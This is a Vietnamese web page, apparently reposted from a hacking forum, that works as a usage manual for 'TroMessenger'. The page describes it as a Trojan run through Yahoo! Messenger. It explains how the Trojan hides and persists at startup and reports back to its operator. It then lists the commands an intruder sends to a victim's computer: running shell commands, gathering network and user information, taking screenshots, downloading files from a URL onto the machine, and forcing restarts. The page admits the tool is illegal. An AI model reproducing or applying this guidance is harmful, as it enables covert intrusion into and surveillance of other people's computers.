- Quản Trị Mạng: Xâm nhập máy tính từ xa thông qua Yahoo! Messenge.
- http://quantrimang.com/view.asp?Cat_ID=11&Cat_Sub_ID=0&news....
- Trang chủ | Khoahoc.com.vn | Bongda.com.vn | Hotjobs.com.vn | Gamevui.com | Ecodebank.com | Gửi bài viết | Liên Hệ.
- ĐỒ HỌA MÁY TÍNH DOANH NGHIỆP CNTT.
- HOTJOBS.COM.VN VIẾT BÀI.
- QuanTriMang.com Search.
- Xâm nhập máy tính từ xa thông qua Yahoo!.
- Sơ lược chương trình.
- Đây là một chương trình xâm nhập và kiểm soát máy tính từ xa thông qua Yahoo!.
- Với công cụ này, bạn có thể kiểm soát bất cứ một máy tính nào bằng cách gửi thông tin qua Yahoo!.
- Messenger ảo thiết lập trong hệ thống.
- Từ đó bạn có thể ra lệnh cho máy đối tượng làm theo bất kỳ mệnh lệnh nào..
- Cơ chế hoạt động:.
- Sau đây là quy trình hoạt động của chương trình sau khi xâm nhập:.
- 1) Chạy vào chương trình khởi động (Startup)..
- 2) Kiểm soát bộ nhớ hệ thống..
- 3) Nằm ẩn chờ khi có kết nối vào mạng..
- 5) Gửi thông tin về cho chủ nhân, sau khi quá trình phát tín hiệu thành công..
- 6) Và bây giờ bạn đã có thể kiểm soát mọi thứ trên máy nạn nhân..
- Chương trình không hỗ trợ trên Windows 2000, Windows 98 đến thấp hơn, và hệ thống Linux..
- 6) Kết nối mạng thường xuyên.
- Chương trình hoạt động với mọi loại mạng.
- Ví dụ:.
- Chương trình vẫn hoạt động với điều kiện truy cập mạng bình thường.
- Nhưng điều kiện kết nối liên tục thường xuyên sẽ giúp quá trình phát tín hiệu và gửi thông tin tốt.
- Sponsored - Ads by QuanTriMang.com BóngĐá.com.vn - Bóng Đá.
- KhoaHoc.com.vn - Khám phá tri thức.
- HotJobs.com.vn - Việc làm trực tuyến Đăng tuyển miễn phí, Kiếm việc ưng ý.
- Không đòi hỏi IP Address! Đây là ưu thế mạnh nhất của chương trình này.
- Trong những chương trình trước đây bạn buộc phải có và khai báo một IP Address trong quá trình kiểm soát.
- Với chương trình này thì không đòi hỏi IP Address..
- Nghi vấn - Làm thế nào có thể thực hiện kiểm soát mà không cần IP Address?.
- Giải đáp - Bởi vì chương trình này tạo ra hẳn một Yahoo! ID ảo cho bạn, vì vậy bạn không cần phải khai báo IP Address từ máy điều khiển.
- Mặc dù IP Address vẫn được gửi cho bạn khi kết nối.
- Nhưng đó chỉ là thông tin cung cấp thêm cho bạn về máy bị kiểm soát, và không có tác dụng gì đối với chương trình TroMessenger..
- Chạy ẩn trong hệ thống mạng LAN, kể cả hệ thống Router của máy chủ.
- Đây là một khuyết điểm của hầu hết các loại Trojan, như là Troya, chỉ hoạt động trên hệ thống có IP tĩnh.
- Trước đây, bạn phải có được IP Address hợp lệ.
- Ví dụ: nếu có một hệ thống mạng với 5 máy tính và bạn là một thành viên trong hệ thống mạng đó, bạn có thể truy cập vào các máy khác.
- Nhưng ai đó nằm ngoài hệ thống mạng này thì không thể truy cập vào bất cứ máy nào trong hệ thống.
- Bởi vì anh ta không có IP Address hợp lệ để liên kết vào hệ thống.
- Với TroMessenger, bạn có thể truy cập vào bất cứ máy nào ở bất kỳ hệ thống mạng nào.
- Chỉ cần mọi máy tính được kết nối vào mạng và TroMessenger đang nằm ẩn bên trong..
- Trong phiên bản này, đây là một số câu lệnh khởi đầu cho việc kiểm soát..
- Bạn có thể thực thi lệnh DOS trên máy bị kiểm soát, và nhận được kết quả.
- đều có thể được sử dụng như lệnh DOS..
- Ví dụ: /cmd dir C:\*.txt].
- Bạn có thể thực thi một số lệnh DOS đặc biệt để khai thác thông tin từ phía máy bị kiểm soát..
- Bạn có thể sử dụng linh động các thông số để khai thác thông tin cụ thể nhất.
- Ví dụ: /cmd dir /on , /cmd dir *.txt /cmd ipconfig - Lấy thông tin truy cập.
- Câu lệnh có chức năng khai thác thông tin từ thiết bị mạng đang sử dụng trên máy bị kiểm soát.
- /cmd tasklist - Lấy danh sách các chương trình đang hoạt động.
- /cmd whoami - Cung cấp thông tin để xác định máy qua mạng.
- Thông tin gửi về gồm : TÊN MIỀN / TÊN NHÓM MẠNG , Tên máy tính và tên truy cập máy tính sử dụng WINDOWS.
- Lưu ý : Câu lệnh này chỉ hoạt động với Windows Server 2003..
- /cmd netstat - Hiển thị hệ thống mạng và tất cả kết nối hiện có trên máy tính.
- Để đạt tốc độ nhanh, sử dụng /cmd netstat -na.
- Khai thác thông tin của máy tính.
- Chỉ việc sử dụng câu lệnh này, bạn có thể lấy được thông tin chính từ máy đối tượng..
- Một máy tính có thể có nhiều hơn một địa chỉ IP khi hoạt động.
- Ví dụ : bạn có một tài khoản để kết nối internet, và máy tính của bạn đang nằm trong một khu vực kết nối mạng nội bộ (LAN).
- Vì vậy bạn sẽ có 2 địa chỉ IP ấn định trong máy tính.
- TroMessenger sẽ gửi toàn bộ địa chỉ IP hiện hành trên máy tính..
- Ví dụ : Windows Server 2003 Service Pack 1..
- /computername - cho biết tên thiết lập của máy trên hệ thống mạng.
- Các máy tính nhận dạng nhau qua tên này.
- Nếu máy tính hiện thời chưa được kết nối, không thành vấn đề, nội dung sẽ được gửi ngay sau đó..
- /winusername - cho biết tài khoản quản lý sử dụng Windows.
- Đặc biệt trong Windows XP, có thể sẽ có nhiều tài khoản sử dụng cùng một máy.
- Và thông tin này sẽ được thay đổi mỗi khi người sử dụng truy cập..
- /yahooid - Cho biết tên Yahoo ID của người cuối cùng đang bị kiểm soát..
- Sẽ có nhiều câu lệnh hơn trong những phiên bản mới.
- Lúc đó bạn chỉ cần sử dụng lệnh này..
- /screenshot - Cho bạn ảnh chụp màn hình của máy tính đối tượng..
- Nghi vấn - Yahoo! Messenger là chương trình viết bằng ngữ lệnh, làm sao TroMessenger có thể cho tôi xem ảnh chụp.
- /download - Tải về một thứ gì đó và lưu lại trên máy đối tượng.
- Bạn sẽ được thông báo khi quá trình hoàn tất..
- Câu lệnh: /download "http://www.hostname.com/folder/file.zip".
- Chú ý: Bạn phải sử dụng dấu ngoặc (".
- /restart - Khởi động lại máy tính..
- Chú ý: Nếu bạn chạy thử nghiệm trên máy tính của bạn, bạn sẽ bị khởi động ngay lập tức mà không có tín hiệu thông báo nào.
- Và những chương trình trên máy sẽ bị mất.
- Hãy cẩn thận khi sử dụng câu lệnh này.
- /shutdown - Tắt máy tính.
- Được sử dụng khi bạn muốn đọc những tập tin không phải là tập tin văn bản từ máy đối tượng /status , /idle , /busy - Đặt tín hiệu hiển thị cho địa chỉ ảo.
- Câu lệnh ví dụ.
- /cancel - Đình chỉ câu lệnh đang thực hiện.
- Ví dụ khi bạn muốn xem một tập tin văn bản có dung lượng 1MB.
- /login - Đăng nhập tài khoản sử dụng quản lý.
- Mỗi khi TroMessenger khởi động, nếu bạn không được xác nhận là chủ quản lý của chương trình, nhưng bạn biết mật khẩu, bạn sẽ sử dụng /login your password để bắt đầu điều khiển chương trình..
- Không sử dụng dấu ngoặc cho mật khẩu....
- Nhưng chú ý: Đây là chương trình xâm nhập trái phép và có thể có Trojan nên khi bạn giải nén ra một số file sẽ bị Symantec và NAV kill luôn.
- moonlight123 - HVA Online Email:
[email protected]